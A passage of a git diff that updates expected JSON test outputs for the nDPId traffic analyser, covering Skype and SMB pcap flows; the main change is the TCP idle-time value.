-00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970691783,"flow_last_seen":1431970692055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":51300,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1266,16 +1266,16 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} diff --git a/test/results/smb_deletefile.pcap.out b/test/results/smb_deletefile.pcap.out index 723f030be..0ab22d547 100644 --- a/test/results/smb_deletefile.pcap.out +++ b/test/results/smb_deletefile.pcap.out @@ -1,11 +1,11 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smb_deletefile.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1584368315417} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"thread_ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} -01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 